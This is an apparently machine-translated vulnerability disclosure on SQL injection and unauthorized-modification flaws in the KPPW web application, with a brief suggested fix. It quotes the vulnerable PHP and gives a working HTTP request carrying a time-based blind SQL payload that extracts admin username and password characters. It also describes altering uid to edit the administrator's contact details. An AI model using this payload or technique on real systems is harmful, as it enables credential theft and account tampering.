KPPW Latest Version SQL injection vulnerability 3 (SQL injection and unauthorized operations)

KPPW Latest Version SQL injection vulnerability 3 (SQL injection and unauthorized operations)

KPPW Latest Version SQL injection vulnerability 3 (SQL injection and unauthorized operations), with a script

First, SQL Injection

File/control/user/account_basic.php:

If ($ intUserRole = 2 ){......} else {$ intAuthStatus = keke_auth_fac_class: auth_check ("realname", $ gUid); if (isset ($ formhash) & kekezu: submitcheck ($ formhash )) {if (strtotime ($ birthday)> = strtotime (date ('Y-m-d', time ()))) {$ tips ['errors '] ['birthday'] = 'birthdate cannot be greater than or equal to the current date'; kekezu: show_msg ($ tips, NULL, 'error');} if (strtoupper (CHARSET) = 'gbk') {$ truename = kekezu: utftogbk ($ truename );} $ arrData = array ('indus _ pid '=> $ indus_pid, 'indus _ id' => $ indus_id, 'truename' => $ truename, 'Sex '=> $ sex, 'birthday' => $ birthday,); $ objSpaceT-> save ($ arrData, $ pk); unset ($ objSpaceT); kekekezu :: show_msg ('saved ', NULL,' OK ');}}

When saving the basic information, the variable $ pk enters the save function.

Follow up with the save Function, file/lib/inc/keke_table_class.php:

function save($fields, $pk = array()) {foreach ( $fields as $k => $v ) {$kk = ucfirst ( $k );$set_query = "set" . $kk;$this->_table_obj->$set_query ( $v );}$keys = array_keys ( $pk );$key = $keys [0];if (! empty ( $pk [$key] )) {$this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" );$edit_query = "edit_" . $this->_pre . $this->_table_name;$res = $this->_table_obj->$edit_query ();} else {$create_query = "create_" . $this->_pre . $this->_table_name;$res = $this->_table_obj->$create_query ();}if ($res) {return $res;} else {return false;}}

When $ pk [$ key] is not blank, $ key enters the where condition, and finally enters> $ edit_query to enter the SQL statement.

Because the key here is processed globally and is not protected by quotation marks, this causes SQL injection.



Second, SQL Injection

File/control/user/account_contact.php:

if (isset($formhash)&&kekezu::submitcheck($formhash)) {$arrData =array('email'=>$email,'mobile'=>$mobile,'qq'=>$qq,'msn'=>$msn,'phone'=>$phone,'province'=>$province,'city'=>$city,'area'=>$area);$intRes = $objSpaceT->save($arrData,$pk);

Similarly, the variable $ pk enters the SQL statement. The principle is the same as above, leading to the SQL injection vulnerability.



This is because the where condition is used to update the basic user information based on the uid of the user data.

Therefore, we can update the basic information of any user, resulting in unauthorized operations.

Similarly, you can modify the contact information of any user.

Two SQL injections and two unauthorized operations

Sending this request will delay the return of 5 seconds:

POST /KPPW2520141118UTF-8/index.php?do=user&view=account&op=basic HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=account&op=basicContent-Length: 239Cookie: PHPSESSID=v8bshmlaa5qi5s47tnbpvulba5Connection: keep-alivePragma: no-cacheCache-Control: no-cacheformhash=6cb7d4&pk%5Buid%3d5529+and+if(mid((select+concat(username,password)+from+keke_witkey_member+limit+0,1),1,1)%3dchar(97),sleep(5),1)%23%5D=5529&indus_pid=-1&indus_id=-1&truename=%E4%B9%8C%E4%BA%91%E4%B8%80&sex=-1&birthday=1111-11-11

View database execution results
 

The SQL statement is successfully executed.

Use sqlmap to obtain data.

The test code provides a simple script for running data.



Unauthorized operation. Here we register a common user for logon.

Then modify the contact information, capture the packet, and modify uid = 1, that is, the admin uid.
 

Then you can modify the contact information of the Administrator.
 

 

Solution:

The system filters keys globally, making them uncontrollable. You can consider adding a fixed value list to keys.